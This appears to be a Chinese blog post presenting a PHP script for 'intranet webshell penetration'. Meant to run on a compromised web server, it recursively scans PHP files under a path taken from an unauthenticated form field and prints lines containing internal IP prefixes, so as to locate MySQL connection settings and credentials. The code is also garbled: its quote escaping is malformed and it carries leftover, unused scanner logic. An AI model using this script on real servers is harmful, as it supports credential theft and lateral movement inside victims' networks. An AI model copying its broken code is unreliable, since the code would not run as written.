php扫马、内网查mysql数据库账号密码（内网webshell渗透）

ycycoco

　　<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>∷ Scanwebshell </title>
<STYLE>
body{ SCROLLBAR-FACE-COLOR: #719BC5; FONT-SIZE: 12px; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #ffffff; SCROLLBAR-ARROW-COLOR: #ffffff; SCROLLBAR-TRACK-COLOR: #ffffff; FONT-FAMILY: "宋体"; SCROLLBAR-DARKSHADOW-COLOR: #ffffff
font-family: 宋体; font-size: 9pt}
　　INPUT {BORDER: 1px none silver; }
</STYLE>
</head>
<body>
　　
<?php
if(@set_time_limit(0)) ini_set("max_execution_time",0);
$time=explode(" ",microtime());
$starttime=$time[0]+$time[1];
echo "本文件路径:".str_replace('//','/',dirname(__FILE__))."<br>";
$scan_ex="php"; //扫描文件后缀
$count_all=0; //总共扫描文件个数
　　//die();
//扫描的函数,判断192开头
$check_system_fun = array("192.168","10.0."

);
//返回的可疑文件
$dan_file_array=array();
global $scan_ex,$count_all,$scan_path,$check_file_fun,$dan_file_array;
　　//判断文件后缀
function get_ex($file_name)
{
$retval="";
$pt=strrpos($file_name, ".");
if ($pt) $retval=substr($file_name, $pt+1, strlen($file_name) - $pt);
// echo $retval."<br>";
return ($retval);
}
　　
//检查文件
function check($file_name)
{
global $dan_file_array;
global $check_system_fun;
　　$content_num=0;
$funs_info='';
$include_info='';
$contents_info='';
$time_info='';
$result = false;
$file_contents = file ($file_name);
$time_info.="文件创建时间:".date("F d Y H:i:s.", filectime($file_name))."<br>";
$time_info.="文件修改时间:".date("F d Y H:i:s.", filemtime($file_name))."<br>";
foreach ($file_contents as $file_content)
{
$mask=1;
$content_num=$content_num+1;
foreach ($check_system_fun as $func_name)
{
if(eregi($func_name,$file_content))
{
$funs_info=$funs_info."在第".$content_num."行存在关键字".$func_name."可能文件在试图执行系统命令<br>";
if($mask==1)
{
$contents_info.=htmlspecialchars(substr($file_content,0,100))."<br>";
$mask=0;
}
}
}
}
　　

if(stristr($include_info,'试图执行')==false)
{
if($include_info!='')
{
echo "<tr>";
echo "<td width=/"20%/" border=10 valign=/"top/">$file_name</td>";
echo "<td width=/"30%/" border=10 valign=/"top/">$include_info</td>";
echo "<td width=/"20%/" border=10 valign=/"top/">$contents_info</td>";
echo "<td width=/"20%/" border=10 valign=/"top/">$time_info</td>";
echo "</tr>";
}

if($funs_info!='')
{
echo "<tr>";
echo "<td width=/"20%/" border=10 valign=/"top/">$file_name</td>";
echo "<td width=/"30%/" border=10 valign=/"top/">$funs_info</td>";
echo "<td width=/"20%/" border=10 valign=/"top/">$contents_info</td>";
echo "<td width=/"20%/" border=10 valign=/"top/">$time_info</td>";
echo "</tr>";

}
}
}
　　
　　//遍历目录
function list_dir($dirname)
{
//变量
global $scan_ex,$count_all;
//Win系统
// if($dirname[strlen($dirname)-1]!='//')
// $dirname.='//';
//*inx系统
if($dirname[strlen($dirname)-1]!='/') $dirname.='/';
static $result_array=array(); //静态数组，保存函数返回值。
$handle=opendir($dirname);
while ($file = readdir($handle)) {
if($file=='.'||$file=='..' || $file=='attachments') continue;
if(is_dir($dirname.$file)) list_dir($dirname.$file.'/'); //如果是目录，递归调用。
if(strpos($file,'.php')) {
$result_array[]=$dirname.$file;
$count_all=$count_all+1;
}
}
closedir($handle);
return $result_array;
}
//列出文件
if($_POST[action]!=scan)
{
echo "<form action=$_SERVER[PHP_SELF] method=post>";
echo "扫描路径:<input type=text name=scan_path style=/"border: 1px solid #084B8E/" ><br>";
echo "文件后缀:<input type=text name=scan_ex style=/"border: 1px solid #084B8E/"><br>";
echo "<input type=hidden name=action value=scan><br>";
echo "<input type=submit value='开始检测'><br>";
}
else {
global $scan_path;
if(empty($_POST['scan_path'])) {
$scan_path=str_replace('//','/',dirname(__FILE__));
} else{
$scan_path=$_POST['scan_path'];
}
$array=list_dir($scan_path);
echo "共检测$count_all files!个文件<br>";
?>
<table width="100%" border="1" cellpadding="0" cellspacing="0" style="padding:5px;line-height:170%;clear:both;font-size:12px">
<tr>
　　<td width="80" valign="top">文件绝对路径</td>
<td width="80" height=30 valign="top">特征码与描述</td>
<td width="80" height=30 valign="top">文件内容明细</td>
<td width="80" height=30 valign="top">文件时间明细</td>
</tr>
<?
foreach($array as $value)
{
check($value);
}
echo "</table>";
$time=explode(" ",microtime());
$endtime=$time[0]+$time[1];
$time=$endtime-$starttime;
echo "本次检测花费时间".$time."秒";
}
　　?>